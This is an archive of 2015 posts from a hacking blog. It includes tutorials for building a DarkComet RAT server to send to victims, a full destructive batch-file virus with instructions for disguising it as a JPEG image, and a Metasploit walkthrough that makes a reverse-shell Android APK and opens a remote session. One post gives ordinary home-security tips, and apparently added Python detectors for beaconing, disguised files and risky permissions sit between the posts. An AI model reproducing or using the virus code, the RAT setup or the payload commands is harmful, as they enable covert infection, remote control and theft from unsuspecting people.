Wednesday 25 February 2015

Remote Administration Tool Darkcomet RAT Setting up Without Portforwarding

Remote Administration Tool Darkcomet RAT- picateshackz.com

This is a step-by-step tutorial with screenshots explaining how to set up the remote server of the Darkcomet RAT remote administration tool without port forwarding.


Let's start,

1) Click Here and create your No-IP account first.

2) Now click on Add a Host.

3) You will now see this page. Fill in the hostname field with a name. Your IP will be entered automatically.

4) Install the No-IP DUC and open it. Click on Select Hosts.

5) Select the host you created and then click on Save.



PROXPN

Note: If you have port forwarded, skip this part. Follow this part if you can't port forward. Read my previous tutorial to set up Darkcomet with port forwarding.

1. Click Here, install Proxpn and create an account.

2. Now connect.


DARKCOMET



1. Open up Darkcomet and click on edit server.

2. Don't select Security Password, and click on generate a few times.

3. Now go to network settings and enter your no-ip address and desired port number, then click on Test Network and then Add this configuration.

4. Now go to module start up and choose the options that are in the image, because these settings can interfere with crypting. I recommend using crypter start up.

5. Adding a message is your choice.

6. Don't select any options, as these will make the user think they are infected, so they might just format their PCs.

7. Make sure that is checked.

8. Now go to build module and select what is in the image (it should be generate stub, most likely) and click build. You can save it wherever you want.


You are done,

Now you can RAT someone by giving him/her this Server file (.exe)

Read my previous post to bypass antivirus detection  when you send your server file for remote installation.

You can also use FUD crypter and binder tools for this.
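From the defender's side, the setup above leaves a network trace: the built server has to resolve a dynamic-DNS hostname to find its controller. The following added example (not part of the original post) flags clients that look up such hostnames at regular intervals in a DNS query log. The log format, the sample lines and the suffix list are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime

# Assumption: a partial list of dynamic-DNS suffixes; extend it for your network.
DYNDNS_SUFFIXES = ("no-ip.org", "no-ip.biz", "ddns.net", "hopto.org", "zapto.org")

# Constructed sample log, one query per line: "<ISO time> <client IP> <name>"
SAMPLE_LOG = """\
2015-02-25T10:00:00 10.0.0.5 www.example.com
2015-02-25T10:00:05 10.0.0.7 constructed-sample.no-ip.org
2015-02-25T10:00:40 10.0.0.5 no-ip.org.example.com
2015-02-25T10:01:05 10.0.0.7 constructed-sample.no-ip.org
2015-02-25T10:01:30 10.0.0.9 one-off-sample.ddns.net
2015-02-25T10:02:06 10.0.0.7 Constructed-Sample.no-ip.org.
2015-02-25T10:03:05 10.0.0.7 constructed-sample.no-ip.org
this line is malformed and is skipped
"""


def normalise(name):
    """Lower-case a DNS name and drop the trailing root dot."""
    return name.rstrip(".").lower()


def is_dyndns(name):
    """True only when the name is, or ends in, a listed suffix label-wise."""
    name = normalise(name)
    return any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES)


def dyndns_lookups(log):
    """Map (client, name) to the sorted times of its dynamic-DNS queries."""
    seen = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines instead of failing the whole run
        stamp, client, name = parts
        try:
            when = datetime.fromisoformat(stamp)
        except ValueError:
            continue
        if is_dyndns(name):
            seen[(client, normalise(name))].append(when)
    return {key: sorted(times) for key, times in seen.items()}


def find_beacons(log, min_hits=3, max_jitter=5.0):
    """Return {(client, name): mean gap in seconds} for periodic lookups."""
    findings = {}
    for key, times in dyndns_lookups(log).items():
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        # A human browsing produces irregular gaps; an implant retries on a timer.
        if all(abs(gap - mean) <= max_jitter for gap in gaps):
            findings[key] = mean
    return findings


if __name__ == "__main__":
    for (client, name), mean in find_beacons(SAMPLE_LOG).items():
        print(f"{client} looks up {name} about every {mean:.0f}s")
```

A single lookup of a dynamic-DNS name is common and benign on many networks, so `dyndns_lookups` is best treated as an inventory and `find_beacons` as the alerting signal.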

Saturday 21 February 2015

Top 10 Ways To Secure Your Digital Life From Hackers

Secure Your Digital Life From Hackers- picateshackz.com

In this post I discuss what your digital life is and how it can be hacked, and then give you the top 10 ways to secure your digital life from hackers.

When Wired News reporter Mat Honan had his digital life hacked—and subsequently, virtually wiped out—in August, the significant loss of data he endured wasn't the scariest part of the experience. Much more terrifying was the method by which hackers drilled into his digital accounts.

Using clever social engineering exploits, the hackers posed as Honan and succeeded in extracting key bits of personal information from Amazon and Apple customer support. With the critical data in hand, the hackers then locked Honan out of his Google account, commandeered his Twitter stream, seized control of his Apple ID number, and wiped his computing devices clean.

It was momentarily life-wrecking, at least.

If a hacker wanted to ruin your life—whether by identity theft or by a simple Honan-esque data wipe—how difficult would that objective be to achieve? The answer is that it's likely a lot easier than you think.

Are you an easy target?


According to a recent Harris Interactive poll commissioned by Dashlane, a company that manages passwords and personal data, most online Americans are concerned that their personal data might be used online without their knowledge. Approximately 88 percent of the 2208 adults surveyed cited being at least "somewhat concerned," and 29 percent claimed to be "extremely concerned." In addition, three out of five respondents were worried that they were vulnerable to being hacked.

John Harrison, a group manager at Symantec Security and Response, says that people should be concerned, because they're sharing more than they think they are.

Because social networks, public records, and high-profile security breaches are so prevalent, a lot of potentially sensitive information is just floating around the Internet.

"Each piece of information adds to the puzzle," Harrison says. "We don't throw everything out there at once, but it eventually comes together. For example, you may not put your full birthday on Facebook, but it's not difficult for someone to find out what year you graduated from high school and put two and two together."

In other words, you may not think you're sharing too much—just a snippet here and a snippet there—but to a hacker, you're building an easily harvested online profile.


1. Secure your WIFI connection



Home users are particularly prone to leaving their routers open without passwords. To make sure that you're protected, check your router settings to verify that encryption is turned on. Leaving access unencrypted can lead to anything from the minor issue of unauthorized users freeloading off your bandwidth to more serious cybercrimes, such as credit card fraud or hacking carried out over your internet connection, which may be traced back to you.

The majority of routers support encrypted connections using either WEP or WPA/WPA2. Always opt for WPA/WPA2, as it's far more secure. If you have the option to hide SSID broadcast, turn that on as well: it makes your wireless router invisible to outsiders, who then need to know your SSID to access the network.



2. Encrypt your hard drive



It's important to keep your data secure in case your hardware is lost or stolen. An encrypted hard drive prevents its contents from being accessed without the password. It is obviously more important to encrypt thumb drives and laptop drives.

Windows 7 Ultimate and Business editions come with built-in drive encryption called BitLocker, which will encrypt your entire hard drive. Users of Home Premium or Basic shouldn't feel left out, as there is a free way to encrypt your hard drive using TrueCrypt.

Mac users can use FileVault to encrypt their folders, and OS X Lion will allow you to encrypt your entire hard drive as well. You can also get hardware encryption that uses fingerprint recognition to unlock the data inside the drive, like the LaCie Rugged Safe.


3. Keep your software updated


It’s a given that you need to keep your operating system, antivirus and web browser up to date in order to protect yourself from exploits, and if you haven’t got automatic update turned on for them, you should do it now.

However, a lot of users overlook other software such as Acrobat Reader, Flash, Java and iTunes when it comes to keeping software updated. It's important to realize that many of these applications have direct access to the operating system, and an exploit in these applications can be used as a gateway into your system files. Flash and Acrobat are used heavily with web browsers, which are the number one source of malware infections.

4. Upgrade your antivirus suite.


It is as important to keep your antivirus suite itself updated as it is to keep your virus definitions updated. The reason is that antivirus software evolves in the way it deals with malware, for example by introducing heuristic technologies that identify common traits of viruses and the way they interact with the system, and actively block these scripts.

This is why outdated antivirus software, even with updated virus definitions, may not provide the best possible protection. If you're using an older version of antivirus software, you may be entitled to discounted upgrades to newer versions.

5. Secure your smartphones


Many people completely overlook this fact, but smartphones are essentially mini computers which hold swathes of personal information about you. They often hold logins to your Facebook and Twitter accounts set to log in automatically, online banking and other financial information, as well as access to email. If someone gets hold of all these details, it can cause a lot of stress and havoc in your life.

It's vital to keep the password lock activated on your devices. Additionally, you should take some precautionary measures in case you lose your device.

Apple has a very cool security software called Find my iPhone which is a free app by Apple, which lets you track your phone by GPS, lock and remotely delete data from it. You can even use it just to locate your iPhone if you misplace it, causing it to sound an alarm.

For Android users it's important to stay protected. Smartphones are just as vulnerable to viruses as a PC, although the Android platform is more prone to them than Apple's due to its open nature. Android phones require antivirus protection, and all the popular desktop antivirus brands offer Android support as well.

The App Store is less prone to malware because all apps are vetted by Apple before publishing, although if you've jailbroken your iPhone, antivirus protection may be something you need to look at.

6. Vet web page links using a link checker

Cyber criminals are using sophisticated strategies to drive users onto their web pages. Increasingly, innocent websites are being targeted: attackers use exploits to find security holes, hack the site and implant code that can launch JavaScript applications and infect computers when users visit the infected site.

Link checkers scan the links in your search results, and optionally on other websites, and indicate whether the links are safe. Websites are scanned by the link checker's own servers, so it does not impair your computer's performance. Link checkers are available with most anti-malware security suites, such as those from AVG, McAfee and Symantec.


7. Laptop Security for mobile workers


Laptop thefts are common, and laptops are easy targets due to their transportable nature. If you work away from your office, it's important to invest in a Kensington Lock. While a lock won't stop trained thieves armed with cable cutters, it will stop opportunistic thieves, who account for the overwhelming majority of laptop thefts.

It's also important to keep prying eyes away from your data. Always password protect your login, and when leaving your laptop unattended, use the screen lock feature in Windows to prevent unauthorized users from looking at or accessing your information.

If you work with particularly sensitive data, a privacy screen may provide an added level of protection. The screen is only viewable by the person sitting directly in front of it, so people sitting around you cannot look at your screen. Targus and 3M are well known for producing privacy screens for all manner of monitor sizes.


8. HTTPS encryption for websites

Most people are well aware of the need to use HTTPS secure connections when entering sensitive personal information for online shopping. However, it can be argued that websites like Facebook, Twitter, Gmail and others hold equally sensitive information about you.

Did you know you can elect to use HTTPS secure connections on these websites? For case-by-case use, you can insert an 's' after the http in the web address, if there isn't one already, to access the site securely. However, if you want to access the sites securely every time you visit, you can log in and select the option to always use HTTPS in the profile settings.

Read my previous article to know more about website security: The SSL Certificate And Website's Security

9. Use online backup to keep an offsite storage of your files.

A great way for mobile workers to keep data safe and secure while on the move is to use online backup. This provides great peace of mind if your computer gets lost, as it allows you to recover your files from the cloud. Online backup services like Sugar Sync also provide high-level synchronization features, which can serve as a great time management tool as well, since they keep data across all your computers consistent and up to date.

You can look up various online backup reviews here to compare their features and read up user reviews.


10. Avoid public wifi and public computers.

Using public computers can be incredibly risky as malware and key loggers can be installed to track your keystrokes and cached files in order to gain access to your private information.

Additionally, public wifi connections can be risky, as the servers can be breached with malware. Phantom hotspots can also be set up which appear to be legitimate hotspots, but are actually other ordinary laptops acting as a middleman and eavesdropping on the connection.

An example of how cached data can be hijacked to log in to your web accounts can be demonstrated using FireSheep.

Thankfully, mobile 3G internet connections are becoming more affordable, and are often faster than public wifi hotspots. 3G connections are far more secure. Additionally, you may be able to tether your smartphone's internet connection to work on your laptop.

I hope this article helped you all. Do follow the top 10 steps above and secure your digital life from hackers.

Thank you.

Thursday 19 February 2015

How To Make A Virus And Hide In An Image File (FUD)

Computer Virus Definition 

A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected". Viruses often perform some type of harmful activity on infected hosts, such as stealing hard disk space or CPU time, accessing private information, corrupting data, displaying political or humorous messages on the user's screen, spamming their contacts, or logging their keystrokes. However, not all viruses carry a destructive payload or attempt to hide themselves; the defining characteristic of viruses is that they are self-replicating computer programs which install themselves without the user's consent.

Creating a dangerous virus using notepad

Here I give you instructions of making a highly dangerous virus using notepad!!

This virus has very very dangerous properties :-

1. Copies itself into startup
2. Copies itself over one thousand times into random spots in your computer
3. Hides itself and all other created files
4. Task kills MSN, Norton, Windows Explorer, Limewire
5. Swaps the left mouse button with the right one
6. Opens alert boxes
7. Changes the time to 12:00 and shuts down the computer

copy this code into notepad and save as Greatgame.bat (while saving select all files instead of text ).

Here is the Code:

@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c "VIRUS DETECTED"startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIP

You are done making virus .

PLEASE DON'T TEST IT ON YOUR COMPUTER:
This was a tutorial for making a batch file virus using notepad. You can also change the name of the virus: after copying this code into notepad, press CTRL + F and replace all occurrences of the word "Greatgame" with the name of your choice, but you also have to change the name of the file.

Hide virus in image file

Here I'm explaining one method of hiding a virus in an image file. By using this trick, you can easily hide a virus or keylogger in a JPEG image file.

If you want to hide virus, you will require following files:

I. Download the tools

1. Easy Binder (free)
2. Image to Icon Converter (free)
3. Icon Changer (free)

Download all the above files and now, you are ready to hide virus in jpeg.

II. Creating an Icon:

For this hack to work, you need an icon of image. Follow the steps below to create an icon:

1. Run Image to Icon Converter from downloaded files.
 Select the image in which you want to hide virus and then open this image in Image to icon converter. (Use image with size within 128 pixels. You can resize image using IrfanView. In IrfanView, Press Ctrl+R).

- Now, click on 128 X 128 checkbox at bottom. Click on Size button and hit on 128 X 128.




2. Adjust image crop, if necessary. Hit on Make. Go to File -> Save and save it on your desktop for later use. Let this icon be "Icon.ico".


III. Steps to hide virus:


1. Now, run Easy Binder.exe from file downloaded to see:




2. Click "+" button present at bottom pane, browse to your virus file named as Greatgame.bat file and add it. Again using same "+" button, add the image in which you want to hide virus.

3. Now, click on "Settings" present at top to see:




4. Now, click on button next to "Select an Icon" and browse to the "Icon.ico" file created in Step II.

5. Click on button next to "Set Output File" and enter the path where you want to save binded file. Hit on "File's" tab in upper pane and then click on "Bind files". Let this final file be "Binded.exe".

NOTE: Now you got the virus file attached with an image file named "Binded.exe" and it will be detected by Anti virus, so to make it fully undetectable (FUD) you need to follow my previous tutorial: 
How To Bypass EXE File's Antivirus Detection Using Metasploit (FUD)



IV. Changing Extension and Icon:

1. After you are done with making your virus file FUD, Open My Computer and go to Tools -> Folder Options. Click on View tab and uncheck "Hide extension for known file types" and hit on OK.

2. Now, rename our "Binded.exe" to say "JessicaAlba.jpeg-JessicaAlba.com"

The format should be:
Imagename.jpeg - Any name.com

I have used JessicaAlba because I am using her image to hide my server.

3. Now, install Icon Changer on your computer obtained from downloaded files. Right click on our binded file and hit on "Change Icon". Hit on Folder icon next to "Search icons in" as shown:




4. In the dialog box, click on Desktop and hit OK. Now, our Icon.ico will be displayed. Select it and hit on "Set".

You will see your final virus like this:



Note: Usually, .exe extension creates a doubt in victim's mind. So, we are using .com extension to fool victim. Usually, people don't have knowledge of .com extension and out of "JessicaAlba.jpeg-Jessica1.com" they consider "JessicaAlba.jpeg" as image name with .jpeg as image extension. This fools the victim.

That's it friends. We are successful to hide virus in a jpeg image. Now, send this binded image file to your victim and whenever he will run the image on his computer, your sent hidden virus will be installed on victim computer without his knowledge.

NOTE:- This virus is very very dangerous , it can crash your system completely.Please do not harm anyone using this virus. This is only for education purposes.
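The renaming trick described above is easy to check for on the receiving side. The following added example (not part of the original post) flags files whose name carries a decoy image or document extension in front of an executable extension, and files whose content starts with the "MZ" executable signature behind a non-executable extension. The file names, the extension lists and the sample bytes are constructed assumptions; the sample "executables" are inert placeholders.

```python
import os
import re
import tempfile

# Assumption: extensions Windows will run directly, and common decoy extensions.
EXEC_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}
DECOY_RE = re.compile(r"\.(?:jpe?g|png|gif|bmp|pdf|doc|txt|mov)(?=[^a-z0-9]|$)")

# Leading magic bytes of the formats this check distinguishes.
MAGIC = ((b"MZ", "pe"), (b"\xff\xd8\xff", "jpeg"), (b"\x89PNG", "png"), (b"GIF8", "gif"))


def sniff(path):
    """Classify a file by its first bytes, ignoring its name entirely."""
    with open(path, "rb") as handle:
        head = handle.read(8)
    for signature, kind in MAGIC:
        if head.startswith(signature):
            return kind
    return "unknown"


def audit(path):
    """Return the reasons, if any, why this file looks like a disguised program."""
    stem, ext = os.path.splitext(os.path.basename(path).lower())
    reasons = []
    if ext in EXEC_EXTS and DECOY_RE.search(stem):
        reasons.append("decoy extension in front of an executable extension")
    if sniff(path) == "pe" and ext not in EXEC_EXTS:
        reasons.append("executable content behind a non-executable extension")
    return reasons


def scan_dir(directory):
    """Audit every regular file in a directory; return {name: reasons} for hits."""
    hits = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            reasons = audit(path)
            if reasons:
                hits[name] = reasons
    return hits


def build_samples(directory):
    """Write constructed, inert sample files that exercise each rule."""
    fake_pe = b"MZ" + b"\x00" * 62          # header bytes only, not a program
    fake_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    samples = {
        "holiday.jpeg-holiday.com": fake_pe,  # the naming format from the post
        "photo.png": fake_pe,                 # program renamed to look like an image
        "notes.txt.bat": b"rem constructed sample\r\n",
        "beach.jpg": fake_jpeg,               # genuine image, must not be flagged
        "setup.v2.exe": fake_pe,              # honest executable, must not be flagged
    }
    for name, data in samples.items():
        with open(os.path.join(directory, name), "wb") as handle:
            handle.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as workdir:
        build_samples(workdir)
        for name, reasons in scan_dir(workdir).items():
            print(f"{name}: {'; '.join(reasons)}")
```

A mail gateway or download folder watcher can apply the same two checks before a user ever sees the icon, which is the only part of the disguise the recipient is expected to trust.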

Wednesday 11 February 2015

Hack Android Remotely Using Kali Linux

Hack Android Remotely Using Kali Linux- picateshackz.com

This is a tutorial explaining how to remotely hack an Android device using Metasploit in Kali Linux.


Read my previous articles to setup Kali Linux:
Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.


Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

First up you need to find your public/external ip and port forwarding 

Let's start,

Creating a booby trapped APK file


Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted parts: put your Kali Linux IP address in for LHOST and your forwarded port in for LPORT.)



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:





2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists just about every possibility, I think: basically total access to the phone. This should be a warning to users that this isn't an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:


user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444


Then just type exploit to start the handler:





6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metasploit system you should see this:





An active session is created and it drops you automatically into a meterpreter prompt.

8. From here you can type “sysinfo” to get information on the device:




9. You can see the processes running by typing, “ps”:



You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the commands that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:



meterpreter > shell
Process 1 created.
Channel 1 created.
ls


The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
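The permission review recommended above can be automated before an app is ever installed. The following added example (not part of the original post) reads the `uses-permission` entries from a decoded AndroidManifest.xml and raises a red flag when the requests span several kinds of sensitive capability at once. The risk grouping, the threshold and both sample manifests are constructed assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Assumption: an illustrative grouping of permissions by what they expose.
RISK_GROUPS = {
    "costs money": {P + "CALL_PHONE", P + "SEND_SMS"},
    "private data": {P + "READ_SMS", P + "READ_CONTACTS", P + "READ_CALL_LOG"},
    "sensors": {P + "CAMERA", P + "RECORD_AUDIO", P + "ACCESS_FINE_LOCATION"},
    "network": {P + "INTERNET"},
}

# Constructed sample: a "game" asking for nearly everything.
GAME_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.game">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission/>
</manifest>
"""

# Constructed sample: a flashlight app that only needs the camera flash.
FLASHLIGHT_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.flashlight">
  <uses-permission android:name="android.permission.CAMERA"/>
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return the set of permission names declared in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    names = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    names.discard(None)  # tolerate an entry with no android:name attribute
    return names


def audit(manifest_xml, min_groups=3):
    """Group risky permissions and flag apps that span min_groups or more."""
    perms = requested_permissions(manifest_xml)
    groups = {
        label: sorted(perms & members)
        for label, members in RISK_GROUPS.items()
        if perms & members
    }
    return {
        "package": ET.fromstring(manifest_xml).get("package"),
        "groups": groups,
        "red_flag": len(groups) >= min_groups,
    }


if __name__ == "__main__":
    for manifest in (GAME_MANIFEST, FLASHLIGHT_MANIFEST):
        report = audit(manifest)
        verdict = "RED FLAG" if report["red_flag"] else "ok"
        print(f"{report['package']}: {verdict} {sorted(report['groups'])}")
```

No single permission is the signal here; a game that can read messages, use the microphone, place calls and reach the network has everything a remote shell needs.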